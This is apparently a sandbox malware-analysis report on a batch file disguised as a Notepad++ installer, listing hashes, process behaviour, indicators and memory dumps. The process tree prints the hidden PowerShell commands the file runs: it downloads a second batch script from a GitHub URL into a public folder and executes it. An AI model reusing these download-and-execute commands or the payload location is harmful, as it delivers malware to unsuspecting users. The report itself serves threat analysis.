f50144f5f7cd44080a58388a9e04fc9842b9524c22393b558f2ec87ccc0b9595

Analysis

max time kernel
1605s
max time network
1607s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
29/05/2023, 20:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

npp.8.5.3.Installer.x64342423423423424242423423424.bat
Size

8.0MB
MD5

7124300e396ec65fb36a80ddbaa8e9c1
SHA1

cbb49111b002c64b8445f9ec52d1bade0ac04326
SHA256

f50144f5f7cd44080a58388a9e04fc9842b9524c22393b558f2ec87ccc0b9595
SHA512

0bff8f84f2618bff8a7c5ce7abfee3569c462bc17f94bcee1f0a3cd8535247e3af42ff3ec7a4c99359ef92459192870acc378e6303587025f9952d3efae3be95
SSDEEP

12:QjFjjIngZGBdMGel5WkdiV/PFjjIng55w5V/:QjFWBrMGo3IV/PFWqaV/

Score

1^/10

Malware Config

Signatures

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1652	powershell.exe
564	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1652	powershell.exe
Token: SeDebugPrivilege	564	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1936 wrote to memory of 1652	1936	cmd.exe	29
PID 1936 wrote to memory of 1652	1936	cmd.exe	29
PID 1936 wrote to memory of 1652	1936	cmd.exe	29
PID 1936 wrote to memory of 564	1936	cmd.exe	30
PID 1936 wrote to memory of 564	1936	cmd.exe	30
PID 1936 wrote to memory of 564	1936	cmd.exe	30

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\npp.8.5.3.Installer.x64342423423423424242423423424.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1936
- C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden Invoke-WebRequest -URI https://raw.githubusercontent.com/kylianjacky27/newprj/main/batchcode/hoang2 -OutFile C:\\Users\\Public\\okokok.bat;
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1652
- C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden C:\\Users\\Public\\okokok.bat;
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:564

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
67d87abdf51e16370beca2e115a84dda

SHA1
0137c60f3e71b428f375a2d0ce74b10cd6b1a8a2

SHA256
aa42fe8d7469e91547941ed9830b6d72d1e48393eb549933273cef1a1106b9a6

SHA512
6cf58e6cb2a0dd04c26de759b75ab3878f5a17273f673fc6076b2c557b78b1c63281d90187c95528a1a6fe313f5a8f35dcb2f977c16e3f90699289303d651bc4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5U6A9ZD66VO2ABX1BB0U.temp

Filesize
7KB

MD5
67d87abdf51e16370beca2e115a84dda

SHA1
0137c60f3e71b428f375a2d0ce74b10cd6b1a8a2

SHA256
aa42fe8d7469e91547941ed9830b6d72d1e48393eb549933273cef1a1106b9a6

SHA512
6cf58e6cb2a0dd04c26de759b75ab3878f5a17273f673fc6076b2c557b78b1c63281d90187c95528a1a6fe313f5a8f35dcb2f977c16e3f90699289303d651bc4

Download Submit
memory/564-68-0x000000001B140000-0x000000001B422000-memory.dmp

Filesize
2.9MB

Download
memory/564-69-0x0000000002310000-0x0000000002318000-memory.dmp

Filesize
32KB

Download
memory/564-70-0x0000000002684000-0x0000000002687000-memory.dmp

Filesize
12KB

Download
memory/564-71-0x000000000268B000-0x00000000026C2000-memory.dmp

Filesize
220KB

Download
memory/1652-58-0x000000001B2F0000-0x000000001B5D2000-memory.dmp

Filesize
2.9MB

Download
memory/1652-59-0x0000000001FA0000-0x0000000001FA8000-memory.dmp

Filesize
32KB

Download
memory/1652-60-0x00000000027E0000-0x0000000002860000-memory.dmp

Filesize
512KB

Download
memory/1652-61-0x00000000027E0000-0x0000000002860000-memory.dmp

Filesize
512KB

Download
memory/1652-62-0x00000000027E0000-0x0000000002860000-memory.dmp

Filesize
512KB

Download